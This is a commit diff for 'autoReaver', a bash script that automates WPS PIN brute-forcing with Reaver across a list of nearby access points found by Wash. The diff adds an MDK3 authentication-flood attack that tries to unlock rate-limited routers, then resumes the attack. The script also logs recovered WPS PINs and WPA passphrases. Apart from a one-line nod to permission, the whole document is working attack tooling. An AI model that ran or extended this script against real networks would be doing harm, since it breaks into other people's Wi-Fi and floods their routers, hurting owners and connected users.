MDK3 and Check Lock Status Functions complete. Still missing: Loop all BSSID in AP Wash List Function... 	       Detailed Reaver Configuration... 	       Use Aireplay-ng in parallel process for fake Authentication.

diff --git a/autoReaver b/autoReaver
--- a/autoReaver
+++ b/autoReaver
@@ -4,7 +4,8 @@
 ###### I Know, another script to automate Reaver, bla, bla bla, bla....
 ###### This is a bash script that automates multiple AP attack using Reaver and a List of BSSIDs from a text file generated by Wash.
 ###### Remember to ask permission or use it with your onwn AP, be responsible. tested successfully with unpatched or older routers using  WPS 1.0.
-###### More recent devices will lock you down (AP rate limit), in this case the script loops to the next BSSID on the list.
+###### More recent devices will lock you down (AP rate limit), in this case the script will try to unlock de AP using MDK3 Flood attacak,
+###### if it succeeds it will continue to run reaver, otherwise it will loop to the next BSSID on the list.
 ###### Just execute the script, ./autoReaver, you will be prompt to select a WIFI device from a list of devices available,
 ###### WIFI devices info are retrieved from the path in Kali /sys/class/ieee80211
 ###### if at least one physical device is present inside ieee80211 directory, it will be present phy0 or phy(#) directory(s),
@@ -28,7 +29,7 @@
 
 clear;
 
-if [ "$EUID" -ne 0 ]; then
+if [ $EUID -ne 0 ]; then
 	echo "Please run as root!!!";
 	exit;
 fi
@@ -340,34 +341,30 @@ reaverConfig(){
 	local REAVER_OUTPUT;
 }
 
-checkAPStatus(){
+checkLockStatus(){
 	local CMD_LOCK_STATUS;
 	local WASH_OUTPUT;
 	local CHECK_LOCK_STATUS;
 
-	CMD_LOCK_STATUS="timeout --preserve-status $CHECK_APLOCK_TIMEOUT wash -i $WIFI_CARD_MONITOR";
-	CHECK_LOCK_STATUS=$REAVER_TMP_DIR'/'$BSSID_CLEAR'.LockStatus';
-
-	echoBlue "Checking AP Lock Status (Timeout For Result In $CHECK_APLOCK_TIMEOUT Sec)......";
+	echoBlue "Checking AP Lock Status......";
 
 	if [[ ! -f $STATUS_FILE ]]; then
 		touch $STATUS_FILE;
-		echoGreen "Status File for $AP_BSSID Created......";
-	else
-		echoBlue "Status File for $AP_BSSID Found......";
 	fi
 
+	CHECK_LOCK_STATUS=$REAVER_TMP_DIR'/'$BSSID_CLEAR'.LockStatus';
 	touch $CHECK_LOCK_STATUS;
 
+	CMD_LOCK_STATUS="timeout --preserve-status $CHECK_APLOCK_TIMEOUT wash -i $WIFI_CARD_MONITOR";
 	eval $CMD_LOCK_STATUS | {
 		while read -r WASH_OUTPUT; do
-			if [[ $(echo "$WASH_OUTPUT" | grep -ic "$AP_BSSID") != 0 ]]; then
-				if [[ $(awk '{ print $5 }' <<< $WASH_OUTPUT) -eq "Yes" ]]; then
+			if [[ $(echo "$WASH_OUTPUT" | grep -ic "$AP_BSSID") -eq 1 ]]; then
+				if [[ $(awk '{ print $5 }' <<< $WASH_OUTPUT) == "Yes" ]]; then
 					echo "AP_CHECK_STATUS_LOCKED" > $CHECK_LOCK_STATUS;
 					break;
 				else
 					echo "AP_CHECK_STATUS_UNLOCKED" > $CHECK_LOCK_STATUS;
-					break
+					break;
 				fi
 			else
 				echo "AP_NOT_FOUND" > $CHECK_LOCK_STATUS;
@@ -375,6 +372,8 @@ checkAPStatus(){
 		done
 
 		echo $(date +"%d/%m/%Y %H:%M:%S $(cat $CHECK_LOCK_STATUS)") >> $STATUS_FILE
+
+		$(rm $CHECK_LOCK_STATUS);
 	}
 
 	case $(echo $CHECK_LOCK_STATUS) in
@@ -384,7 +383,17 @@ checkAPStatus(){
 			AP_LOCK="No";;
 	esac
 
-	$(rm $CHECK_LOCK_STATUS);
+	case $AP_STATUS_FROM in
+		[1]* ) ### AP Status Request by MDK3
+			if [[ $(cat $MDK3_STATUS) -eq $MAX_CLIENTS ]]; then
+				$(rm $MDK3_STATUS);
+			else
+				if [[ "$AP_LOCK" == "Yes" ]]; then
+					echoRed "AP Is Still Locked......";
+					unlockAP;
+				fi
+			fi
+	esac
 }
 
 unlockAP(){
@@ -392,39 +401,40 @@ unlockAP(){
 	local CMD_MDK3;
 	local MDK3_OUTPUT;
 	local CLIENT_COUNT;
-	local MDK3_STATUS;
+	local LOOP_TARGET=0;
 
 	if [[ ! -f $STATUS_FILE ]]; then
 		touch $STATUS_FILE;
-		echoGreen "Status File for $AP_BSSID Created......";
-	else
-		echoBlue "Status File for $AP_BSSID Found......";
 	fi
 
-	MDK3_STATUS=$REAVER_TMP_DIR'/'$BSSID_CLEAR'.MDK3'
-	touch $MDK3_STATUS;
+	if [[ ! -f $MDK3_STATUS ]]; then
+		MDK3_STATUS=$REAVER_TMP_DIR'/'$BSSID_CLEAR'.MDK3';
+	        touch $MDK3_STATUS;
+	fi
 
 	CMD_MDK3="mdk3 $WIFI_CARD_MONITOR  a -a $AP_BSSID -m";
-
 	eval $CMD_MDK3 | {
 		MDK3PID=$(ps | grep -i 'mdk3' | awk '{ print $1 }');
+		LOOP_TARGET=$(($(cat $MDK3_STATUS)+$MAX_CLIENTS_TURN));
+		echo "Loop Target $LOOP_TARGET Clients";
 
 		while read -r MDK3_OUTPUT; do
-			if [[ $(echo "$MDK3_OUTPUT" | grep -ic "Device is still responding with") != 0 ]]; then
+			if [[ $(echo "$MDK3_OUTPUT" | grep -ic "Device is still responding with") -eq 1 ]]; then
 				CLIENT_COUNT=$(echo "$MDK3_OUTPUT" | awk '{ print $6 }');
 				echo $CLIENT_COUNT > $MDK3_STATUS;
-
-				echo -ne "\r Device is still responding with $(tail -n 1 $MDK3_STATUS)";
+				echo -ne "\r Device is still responding with $CLIENT_COUNT Clients Connected!";
+				if [[ $CLIENT_COUNT -eq $LOOP_TARGET || $CLIENT_COUNT -eq $MAX_CLIENTS ]]; then
+					break;
+				fi
 			fi
 		done
 
-		echo $(date +"%d/%m/%Y %H:%M:%S MDK3_FLOOD_ATTACK") >> $STATUS_FILE
+		echo $(date +"%d/%m/%Y %H:%M:%S MDK3_FLOOD_ATTACK_$LOOP_TARGET") >> $STATUS_FILE
 
 		$(kill "$MDK3PID");
-		$(rm $MDK3_STATUS);
 	}
-
-	checkAPStatus;
+	AP_STATUS_FROM=1;
+	checkLockStatus;
 }
 
 getRandomMac(){
@@ -460,7 +470,7 @@ startMonitor(){
 	local MESSAGE;
 	local CMD_START;
 
-	if [[ $(airmon-ng check | grep -ic "pid") != 0 ]]; then
+	if [[ $(airmon-ng check | grep -ic "pid") -gt 0 ]]; then
 		CMD_KILL="airmon-ng check kill";
 		eval $CMD_KILL >>/dev/null;
 		echoGreen "Processes Killed......";
@@ -515,7 +525,7 @@ checkIEEEPaths(){
 		fi
 	done
 
-	if [ $FOUND == 0 ]; then
+	if [ $FOUND -eq 0 ]; then
 		echoRed "Something Went Wrong With WIFI Device......";
 		echoBlue "Check Your WIFI Device(S).";
 		exitAutoReaver;
@@ -564,7 +574,7 @@ checkRequisites(){
 								CMD_COMMAND="sudo apt-get install ${MISS_REQUISITES[$i]} -y";
 								eval $CMD_COMMAND;
 
-								if [[ $? > 0 ]]; then
+								if [[ $? -gt 0 ]]; then
 									echoRed "${MISS_REQUISITES[$i]} Failed to Install, Exiting......";
 									exitAutoReaver;
 								else
@@ -615,7 +625,7 @@ exitAutoReaver(){
 
 	netManagerStatus=$(systemctl status NetworkManager | awk '{ print $2 }' <<< "$(grep -Ei 'Active:')");
 
-	if [ "$netManagerStatus" = "inactive" ]; then
+	if [[ "$netManagerStatus" == "inactive" ]]; then
 		echoBlue "Restarting Network Manager Service......";
 		systemctl restart NetworkManager;
 	fi
@@ -702,7 +712,7 @@ while true; do
 		esac
 	done
 
-	if [[ $PROCEED == 1 ]]; then
+	if [[ $PROCEED -eq 1 ]]; then
 		PROCEED=0;
 		break;
 	fi
@@ -739,27 +749,27 @@ while true; do
 	eval $CMD_REAVER | {
 		while read -r REAVER_OUTPUT; do
 
-			if [[ $(echo "$REAVER_OUTPUT" | grep -ic "detected ap rate limiting") != 0 ]]; then
+			if [[ $(echo "$REAVER_OUTPUT" | grep -ic "detected ap rate limiting") -gt 0 ]]; then
 				echoRed "[!] WARNING: Detected AP rate limiting......";
 				echo $(date +"%d/%m/%Y %H:%M:%S AP_RATE_LIMITING") >> $STATUS_FILE
 				$(killall -I reaver);
-			elif [[ $(echo "$REAVER_OUTPUT" | grep -ic "wps pin") != 0 ]]; then
+			elif [[ $(echo "$REAVER_OUTPUT" | grep -ic "wps pin") -gt 0 ]]; then
 				echoGreen "$REAVER_OUTPUT";
 				echo $(date +"%d/%m/%Y %H:%M:%S WPS_PIN_FOUND $(awk '{ print $4 }' <<< $REAVER_OUTPUT)") >> $STATUS_FILE;
-			elif [[ $(echo "$REAVER_OUTPUT" | grep -ic "wpa psk") != 0 ]]; then
+			elif [[ $(echo "$REAVER_OUTPUT" | grep -ic "wpa psk") -gt 0 ]]; then
 				echoGreen "$REAVER_OUTPUT";
 				echo $(date +"%d/%m/%Y %H:%M:%S WPA_PSK_FOUND $(awk '{ print $4 }' <<< $REAVER_OUTPUT)") >> $STATUS_FILE;
-			elif [[ $(echo "$REAVER_OUTPUT" | grep -ic "failed to recover wpa key") != 0 ]]; then
+			elif [[ $(echo "$REAVER_OUTPUT" | grep -ic "failed to recover wpa key") -gt 0 ]]; then
 				echoRed "$REAVER_OUTPUT";
 				echo $(date +"%d/%m/%Y %H:%M:%S FAILED_TO_RECOVER_WPA_KEY") >> $STATUS_FILE;
-			elif [[ $(echo "$REAVER_OUTPUT" | grep -ic "receive timeout occurred") != 0 ]]; then
+			elif [[ $(echo "$REAVER_OUTPUT" | grep -ic "receive timeout occurred") -gt 0 ]]; then
 				echoOrange "$REAVER_OUTPUT";
 				echo $(date +"%d/%m/%Y %H:%M:%S RECEIVE_TIMEOUT") >> $STATUS_FILE;
 				$(killall -I reaver);
-			elif [[ $(echo "$REAVER_OUTPUT" | grep -ic "wps transaction failed") != 0 ]]; then
+			elif [[ $(echo "$REAVER_OUTPUT" | grep -ic "wps transaction failed") -gt 0 ]]; then
                                 echoOrange "$REAVER_OUTPUT";
 				echo $(date +"%d/%m/%Y %H:%M:%S WPS_TRANSACTION_FAILED") >> $STATUS_FILE;
-			elif [[ $(echo "$REAVER_OUTPUT" | grep -icw "[!]") != 0 || $(echo "$REAVER_OUTPUT" | grep -icw "[-]") != 0 ]]; then
+			elif [[ $(echo "$REAVER_OUTPUT" | grep -icw "[!]") -eq 1 || $(echo "$REAVER_OUTPUT" | grep -icw "[-]") -gt 0 ]]; then
 				echoOrange "$REAVER_OUTPUT";
 				echo $(date +"%d/%m/%Y %H:%M:%S $REAVER_OUTPUT") >> $STATUS_FILE;
 			else
@@ -768,26 +778,34 @@ while true; do
 		done
 	}
 
-	if [[ $(grep -icw 'ap_rate_limiting' $STATUS_FILE) != 0 ]]; then
+	if [[ $(grep -icw 'ap_rate_limiting' $STATUS_FILE) -gt 0 ]]; then
 		if [[ "$AP_LOCK" == "Yes" ]]; then
 			echoRed "AP Locked......";
 			echoOrange "Trying To Unlock AP......";
 
 			unlockAP;
 
-			if [[ "$AP_LOCK" -eq "Yes" ]]; then
+			if [[ "$AP_LOCK" == "Yes" ]]; then
 				echoRed "Unlock AP Unsuccessful......";
 				echoBlue "Try To Increase Max Clients Value In configurationSettings......";
-				echoBlue "And Try To Run Script Again......";
+				echoBlue "And Run Script Again......";
 				break;
 			fi
 		else
-			### checkLockStatus;
+			AP_STATUS_FROM=2;
+			checkLockStatus;
 
 			if [[ "$AP_LOCK" == "Yes" ]]; then
 				echoRed "AP Locked......";
-				break;
-				### ADDING MDK3 FLOOD ATTACK FUNCTION TO REBOOT AP ###
+				echoOrange "Trying To Unlock AP......";
+				unlockAP;
+
+				if [[ "$AP_LOCK" == "Yes" ]]; then
+					echoRed "Unlock AP Unsuccessful......";
+					echoBlue "Try To Increase Max Clients Value In configurationSettings......";
+					echoBlue "And Run Script Again......";
+					break;
+				fi
 			else
 				if [[ $REAVER_ATTEMPT_DELAY -ge $MAX_DELAY_PIN ]]; then
 					echoRed "Delay Between PIN Attempt Reached $REAVER_ATTEMPT_DELAY Sec.";
@@ -799,12 +817,12 @@ while true; do
 				fi
 			fi
 		fi
-	elif [[ $(grep -icw 'wpa_psk_found' $STATUS_FILE) != 0 ]]; then
+	elif [[ $(grep -icw 'wpa_psk_found' $STATUS_FILE) -gt 0 ]]; then
 		while read -r STATUS_LINE; do
-			if [[ $(echo "$STATUS_LINE" | grep -ic "wpa_psk_found") != 0 ]]; then
+			if [[ $(echo "$STATUS_LINE" | grep -ic "wpa_psk_found") -gt 0 ]]; then
 				WPA_PSK=$(awk '{ print $4 }' <<< $STATUS_LINE);
 				WPA_PSK=$(echo $WPA_PSK | sed s/"'"//g);
-			elif [[ $(echo "$STATUS_LINE" | grep -ic "wps_pin_found") != 0 ]]; then
+			elif [[ $(echo "$STATUS_LINE" | grep -ic "wps_pin_found") -gt 0 ]]; then
 				WPS_PIN=$(awk '{ print $4 }' <<< $STATUS_LINE);
 				WPS_PIN=$(echo $WPS_PIN | sed s/"'"//g);
 			fi
